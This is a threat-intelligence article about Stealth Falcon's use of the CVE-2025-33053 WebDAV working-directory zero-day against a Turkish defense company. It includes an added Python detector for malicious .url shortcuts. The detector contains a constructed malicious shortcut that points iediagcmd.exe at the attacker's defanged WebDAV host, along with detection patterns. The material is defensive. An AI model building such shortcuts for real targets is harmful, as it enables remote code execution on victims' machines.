A new cyberattack campaign attributed to the advanced persistent threat group Stealth Falcon exploited a previously unknown zero-day vulnerability to target a prominent Turkish defense company. The attack achieved remote execution of malware on the victim's machine, showcasing the group's technical capability and planning.
The vulnerability in question, identified as CVE-2025-33053, allows threat actors to manipulate the working directory of legitimate Windows tools, enabling them to execute malicious files from attacker-controlled WebDAV servers. Microsoft responded to this security risk by releasing a patch during its June Patch Tuesday updates, following a responsible disclosure by Check Point Research.
The attack was initiated through a malicious .url file named “TLM.005TELESKOPIKMASTHASARBILDIRIM_RAPORU.pdf.url,” which is Turkish for “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url.” The double extension makes the shortcut look like a PDF. This file was likely distributed as an archived attachment in a spear-phishing email aimed at the Turkish defense contractor.
Upon execution, the .url file launched iediagcmd.exe, a legitimate Internet Explorer diagnostics utility. However, the attackers set the shortcut's working directory to their own WebDAV server at “summerartcamp[.]net@ssl@443/DavWWWRootOSYxaOjr.” iediagcmd.exe starts helper tools by bare name through the .NET Process.Start() method, and that lookup searches the current working directory before the system directories, so the legitimate tool executed the attacker's copies from the remote server rather than the intended system files.
This gave the attackers arbitrary code execution: the malicious route.exe spawned from the WebDAV server used process hollowing to run its payload inside another process, bypassing traditional signature-based defenses.
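The combination described above (a shortcut that launches a local Windows binary while setting its working directory to a WebDAV share) is easy to triage in mail or endpoint pipelines. The following is an added example, not code from the article or from Check Point Research: it parses the INI-style body of a .url file, then flags a URL that points at iediagcmd.exe together with a WorkingDirectory in the WebDAV redirector syntax (host@ssl@443 / DavWWWRoot). The sample file contents are constructed to mirror the paths quoted in the article; the install path of iediagcmd.exe and the document-extension check are assumptions of this example.

```python
"""Triage Internet Shortcut (.url) files for the WebDAV working-directory trick.

Added example (not from the article or Check Point's report). The sample
shortcut bodies below are constructed for this demonstration.
"""
import re
from configparser import ConfigParser

# Local binaries that launch helper tools by bare name and therefore resolve
# them from the working directory first. iediagcmd.exe is the one described in
# the article; extend this set with your own findings.
LOLBIN_TARGETS = {"iediagcmd.exe"}

# WebDAV-style paths as the Windows WebClient redirector writes them:
#   \\host@ssl@443\DavWWWRoot\...   \\host@80\...   host@ssl@443/DavWWWRoot/...
# The [.] is accepted so defanged samples from reports still match.
WEBDAV_RE = re.compile(
    r"(?:\\\\|//)?[\w.\[\]-]+@(?:ssl@)?\d{1,5}[\\/]|davwwwroot", re.IGNORECASE
)

# Shortcut names that pretend to be documents, e.g. "report.pdf.url".
DOC_MASQUERADE_RE = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.url$", re.IGNORECASE)


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys as a lowercase-keyed dict ({} if absent)."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp.items(section))
    return {}


def assess_url_file(text: str, filename: str = "") -> dict:
    """Classify a .url file body as clean, suspicious or malicious."""
    shortcut = parse_url_file(text)
    url = shortcut.get("url", "")
    workdir = shortcut.get("workingdirectory", "")

    # Strip a file:// scheme and keep only the executable's basename.
    target = url.lower().replace("file:///", "").replace("file://", "")
    target_name = re.split(r"[\\/]", target)[-1]

    lolbin = target_name in LOLBIN_TARGETS
    webdav = bool(WEBDAV_RE.search(workdir))

    findings = []
    if lolbin:
        findings.append(f"url launches LOLBin {target_name}")
    if webdav:
        findings.append("workingdirectory points at a WebDAV share")
    elif workdir.startswith("\\\\"):
        findings.append("workingdirectory is a UNC path")
    if filename and DOC_MASQUERADE_RE.search(filename):
        findings.append("document-extension masquerade in filename")

    if lolbin and webdav:
        verdict = "malicious"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"url": url, "workingdirectory": workdir,
            "findings": findings, "verdict": verdict}


# Constructed sample modelled on the paths quoted in the article. The exact
# contents of the real shortcut are not reproduced; the Program Files path
# for iediagcmd.exe is assumed.
SAMPLE_MALICIOUS = """[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\\\summerartcamp[.]net@ssl@443\\DavWWWRoot\\OSYxaOjr\\
ShowCommand=7
"""

# Constructed ordinary web shortcut for comparison.
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://example.com/
"""

if __name__ == "__main__":
    for name, body in (("TLM.005TELESKOPIKMASTHASARBILDIRIM_RAPORU.pdf.url", SAMPLE_MALICIOUS),
                       ("bookmark.url", SAMPLE_BENIGN)):
        result = assess_url_file(body, name)
        print(name, "->", result["verdict"], result["findings"])
```

The verdict deliberately requires both signals for "malicious": a shortcut to a local executable alone is common in legitimate use, and a WebDAV working directory alone is unusual but not proof. Either on its own is worth a "suspicious" ticket, and a UNC working directory in mail-borne shortcuts is rarely benign.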
APT Hackers Exploited WebDAV Zero-Day
Stealth Falcon, also recognized as FruityArmor, has been engaged in cyber espionage operations since at least 2012, primarily targeting high-profile entities across the Middle East and Africa. Recent activities have been noted against government and defense sectors in Turkey, Qatar, Egypt, and Yemen.
The attack unfolded through a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant designed for the Mythic command and control framework. Named after the Egyptian falcon-headed sky god, Horus Agent signifies an evolution from the group’s previously utilized Apollo implant. This malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
Beyond the initial implant, researchers uncovered several previously undisclosed custom tools within Stealth Falcon’s arsenal. These include a DC Credential Dumper that bypasses file locks by accessing virtual disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a custom keylogger utilizing RC4 encryption.
The Horus Agent is designed to perform essential reconnaissance functions, enabling threat actors to fingerprint victim machines and evaluate their value before deploying more advanced payloads. This method serves to protect the group’s sophisticated post-exploitation tools from exposure.
Stealth Falcon consistently employs repurposed legitimate domains acquired through the NameCheap registrar, typically in .net or .com top-level domains. This strategy allows their infrastructure to blend seamlessly with legitimate traffic, complicating attribution efforts.
The group’s ongoing evolution underscores its commitment to maintaining stealth and resilience in its operations. By utilizing commercial code obfuscation tools and custom modifications, they ensure that their payloads remain challenging to reverse-engineer and track over time.
This latest campaign serves as a stark reminder of the persistent threat posed by sophisticated APT groups, which adeptly combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.